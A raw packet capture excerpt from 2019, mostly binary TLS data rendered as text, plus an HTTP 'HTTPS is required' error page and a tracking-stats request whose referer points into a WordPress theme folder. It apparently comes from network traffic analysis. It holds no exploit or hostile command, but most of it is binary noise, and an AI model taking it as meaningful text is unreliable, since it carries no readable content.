.hL…W..V.. ….P.@)…………….5.x.[}..o.V;.|.@ ..L….6i……/.5… ….. . .2.8…….C……..!…..c.sharethis.mgr.consensu.org………. ………….. 2019-05-29 22:03:21.286768 IP 104.76.198.161.443 > 10.1.10.162.49239: Flags [P.], seq 2921:3746, ack 141, win 237, length 825 E .a..@.8.(.hL.. . ….W….V…P…,…………0… ……0…. +…..0……0…0……..a..1a./(..F8.,……20190529032056Z0s0q0I0 ..+……….z….’.5…C………a..1a./(..F8.,………Pr…j.:….3….20190529032056Z….20190605023556Z0.. .H………….i.n9.P.|..@…R..>..i…J….4.)K..jn.BTJ…………../.\I.%k..\/x<0.{…C.w..X.’..n!nA….X..)….z.O.7qW.E…W…….:.QG.}S……....yb.u.,.G.. …K*pv.”…….G.6.-.[…’B.K……6.C…
.b..hO……..0=T…..=…Y….7.e./…e..(v.qB…~6..+.k:….K…G…A…….”.l……...mq..[.^..j{..}Wo..a.}....Q......h#e8.l.b...{I..o....A...G......3.......3.....sl.@..67.....W.. ...bz9a.C.I.....E.ksx.i...v5.....v....).../.VT....5.##.bB.”.?……]0…^’l.!…(d….q….{%.>……. .^..E..B.k.H./D…3.p?……h…|m..!.6…w<.tOJ.?~.y.U……..2?…^…..WK\wL…..pqh.9…e.K.…_K ……… 2019-05-29 22:03:21.305611 IP 10.1.10.162.49239 > 104.76.198.161.443: Flags [P.], seq 141:275, ack 3746, win 16425, length 134 E…..@….4 . .hL…W..V……=P.@)……..F…BA…b.(&7e.-d.i…v..”f……^wF3.L….&r..B…=.8.CP.b$.:.ur;………..0.h…….M.Y,.iP.j.3…hze….z…..I.8.K….}.W 2019-05-29 22:03:21.321761 IP 104.76.198.161.443 > 10.1.10.162.49239: Flags [P.], seq 3746:3805, ack 275, win 245, length 59 E .c..@.8.+.hL.. . ….W…=V…P……………..0.y.l..g[..Z………d…..”…3u`Y; …u(..L..B
2019-05-29 22:03:21.329715 IP 103.221.223.17.443 > 10.1.10.162.49225: Flags [P.], seq 8:430, ack 138, win 22, length 422
E ..Y]..
…g…
.
….I^
t…..P…….400 Bad Request

HTTPS is required

This is an SSL protected page, please use the HTTPS scheme instead of the plain HTTP scheme to access this URL.

Hint: The URL should starts with https://


Powered By LiteSpeed Web Server

http://www.litespeedtech.com

2019-05-29 22:04:14.347717 IP 10.1.10.162.49279 > 198.27.80.143.80: Flags [P.], seq 2027903908:2027904329, ack 3692538470, win 16425, length 421: HTTP: GET /stats/e.php?4214393&@Ab&@R95733&@w HTTP/1.1
E…..@…..
.
…P….Px.[….fP.@)….GET /stats/e.php?4214393&@Ab&@R95733&@w HTTP/1.1
Accept: /
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: s4.histats.com
Connection: Keep-Alive